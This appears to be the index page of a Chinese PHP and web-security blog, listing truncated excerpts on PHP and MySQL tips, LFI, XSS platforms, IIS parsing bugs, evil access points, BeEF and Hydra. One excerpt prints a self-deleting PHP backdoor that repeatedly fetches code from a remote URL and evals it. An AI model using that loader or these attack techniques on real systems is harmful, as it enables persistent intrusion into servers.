h4ck0ne的博客

刚开始学习ThinkPHP就遇到这种问题，还是自己粗心。 错误如下： 原因：开启调试模式，区分大小写的，要把模块名首字母大写就OK了。也就是： [plain] view plain copy http://localhost/php/fanhuar/index/index.php/index/   改成： [html] view plain copy

本帖最后由 小项 于 2016-1-21 11:41 编辑一、写入文件1.打开资源（文件）fopen($filename,$mode)2.写文件fwrite($handle,$str)3.关闭文件fclose($handle)4.一步写入file_put_contents($filename,$str,$mode) FILE_APPEND LOCK_EX}二、读文件1.读文件fread($hand

Author：雪碧 http://weibo.com/520613815 此篇文章技术含量不高，大牛不喜勿喷，Thx！写这篇文章主要是为了各位小伙伴在SAE搭建XSSING平台的时候少走点弯路（同志们 我先去前面帮你们填好坑 =。=） 引用 XSSING平台开源中国资料： xssing 是一个基于 php+mysql的 网站 xss  利用与检测平台,可以对你的产品进行黑盒xss

有空就多整理下曾经研究过的知识和需要温顾的知识,明年可能去寻工作络. 关于PHP中LFI(Local File Include,本地文件包含)漏洞,大家都很熟悉了;paper很多很多,特别是国外的...不过 大家都懒得测试,我就来整理下. 1.普通本地包含; $query=$_GET['p']; include($query); ?>poc:http://127.0.0.1:8080/phpwit

cnrstar (Be My Personal Best!) | 2014-05-20 21:58众所周知，Mysql的用户在没有File权限情况下是无法通过Load_file读文件或者通过into dumpfile 或者into outfile去写文件，但是偶尔在一个网站上发现个小技巧，也就是通过load data infile可以读取本地文件到数据库，这样子我们就可以在低权限下通过这个bug

（1）mysql_real_escape_string -- 转义 SQL 语句中使用的字符串中的特殊字符，并考虑到连接的当前字符集 使用方法如下：  $sql = "select count(*) as ctr from users where username ='".mysql_real_escape_string($username)."' and

今天在做上传的时候出现一个非常怪的问题，有时候表单提交可以获取到值，有时候就获取不到了，连普通的字段都获取不到了，苦思冥想还没解决，群里人问我upload_max_filesize的值改了吗，我说改了啊，。过了一会问post_max_size改了吗，，原来上传是和post_max_size有关系的。  总结:php.ini配置文件中的默认文件上传大小为2M，　默认upload_max_fil

彻底解决mysql中文乱码的办法mysql -uroot -p 回车输入密码 进入mysql查看状态如下：mysql \s mysql不能插入中文默认的是客户端和服务器都用了latin1，所以会乱码。解决方案: mysql>user mydb;mysql>alter database mydb  character set utf8;!另一种方法是直接修改默认的Mysql配

有人说，前端的界限就在浏览器那儿。无论你触发了多少bug，最多导致浏览器崩溃，对系统影响不到哪去。这就像二次元各种炫酷的毁灭世界，都不会导致三次元的世界末日。然而，作为一个前端，我发现是有方式打开次元大门的…这个实验脑洞较大，动机无聊，但某种意义上反映了一些安全问题。想象一下，有天你在家里上网，吃着火锅还唱着歌，点开一个链接，电脑突然就蓝屏了！想想还真有点小激动。 起因故事得从local

修改mysql数据库的默认编码方式修改my.ini文件 加上 default-character-set=gb2312设定数据库字符集 alter database da_name default character set 'charset'1)设置数据库编码 /etc/my.cnf[mysqld]default-character-set=gbk...[client]

echo是PHP语句, print和print_r是函数,语句没有返回值,函数可以有返回值(即便没有用) print（）   只能打印出简单类型变量的值(如int,string)  例子 输出 3 print_r（） 可以打印出复杂类型变量的值(如数组,对象)，如果让数组分行显示就需要加echo "";print_r();echo "";例子 输出

记录下来 经常用到 电脑准备格式化了 一切从头开始 每天浑浑噩噩的不知道干什么。认准一样东西 认认真真的学  IIS6.0解析漏洞，可以上传a.asp;.jps或者a.asp;a.jpg或者a.asp目录下传任意格式小马，都会解析 这次讲的是IIS7.5解析漏洞， http://www.xxoo.com/fckeditor/editor/fcked

因为自己时常用到所以还是发布一下吧/** * 发送post请求 * @param string $url 请求地址 * @param array $post_data post键值对数据 * @return string */function send_post($url, $post_data) {   $postdata = http_build_query($post_d

免责声明：本文旨在分享技术进行安全学习，禁止非法利用。 本文中我将完整的阐述如何通过建立一个非常邪恶的网络接入点来使得用户进行自动文件下载。整个过程中我将使用 Nexus 9 来运行Kali NetHunter 2.0，并使用TP-LINK TLWN722N (150Mbps 版本)作为我的二级网络接口。 工具（下载地址见文末） Mana – 恶意接入点工具包。它能够实现比Kar

有经验的老鸟们就不用看了。（大牛绕过）我们每当渗透一个站点的时候必须要了解他的信息。这是最基础也是最基本的常识。第一要看网站是什么脚本？ 是什么程序？ 有多少类的程序？系列：http://www.zzrsks.com/ 这个站点 我们可以看出是伪静态的。那么如何判断他是属于什么脚本的呢？有很多种方法我就介绍一下最基本的方法。方法1：网站根目录里index.phpindex.aspinde

<?phpunlink($_SERVER['SCRIPT_FILENAME']);ignore_user_abort(true);set_time_limit(0);$remote_file = 'http://xxx/xxx.txt';while($code = file_get_contents($remote_file)){ @eval($code); sleep(5);

MS10-070 ASP.NET Padding Oracle信息泄露漏洞1         漏洞描述：ASP.NET由于加密填充验证过程中处理错误不当，导致存在一个信息披露漏洞。成功利用此漏洞的攻击者可以读取服务器加密的数据，例如视图状态。 此漏洞还可以用于数据篡改，如果成功利用，可用于解密和篡改服务器加密的数据。 虽然攻击者无法利用此漏洞来执行代码或直接提升他们的用户权限，但此漏洞可用于产生信

1.什么是BeEF？ 就是 The Browser Exploitation Framework 的缩写，意在通过一些手段，控制对方的浏览器。里面集成了很多模块，能够获取很多东西，有cookie，浏览器名字，版本，插件，是否支持java，vb，flash等，所以说XSS神器嘛。。大概长这个样子（默认用户名密码是beef，beef）：  2.安装beef和使用beef BT5r3

sh 无密码登录要使用公钥与私钥。linux下可以用用ssh-keygen生成公钥/私钥对，下面我以CentOS为例。有机器A(192.168.1.155)，B(192.168.1.181)。现想A通过ssh免密码登录到B。1.在A机下生成公钥/私钥对。 [chenlb@A ~]$ ssh-keygen -t rsa -P '' -P表示密码，-P '' 就表示空密码，也可以不用-P

Hydra词出自希腊神话，原意是是九头蛇，后被赫拉克罗斯所杀，成为赫拉克罗斯的12件伟大功绩之一。而在计算机上HC-HYDRA是一个支持多种网络服务的非常快速的网络登陆破解工具。支持ssh,RDP,Mysql,Oracle,http,FTP等诸多协议的暴力破解hydra参数详解root@kali:~# hydra -hHydra v8.1 (c) 2014 by van Hauser/THC -